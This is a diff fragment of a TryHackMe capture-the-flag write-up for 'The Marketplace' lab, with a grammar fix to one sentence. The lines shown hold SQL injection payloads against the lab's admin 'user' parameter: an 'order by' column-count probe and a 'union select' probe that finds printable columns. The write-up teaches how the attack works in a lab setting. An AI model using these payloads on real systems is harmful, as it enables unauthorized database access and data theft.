yuvalbatan/writeups/tryhackme/The_Marketplace.md

 http://10.10.243.219/admin?user=1 order by 5-- -
 ```

-5 columns make error so the conclusion is the table has 4 columns:
+5 columns make an error, so the conclusion is that the table has 4 columns:

 ![image](https://user-images.githubusercontent.com/114166939/232224802-6d24f723-e9b9-4ae0-9f13-2ea59de55475.png)

 Let's find out if one of them is printable on the page with 'union select' sql command:

 (I'll add impossible value to the user parameter so it'll print only what I choose to print)
 ```url
 http://10.10.243.219/admin?user=-999 union select 1,2,3,4-- -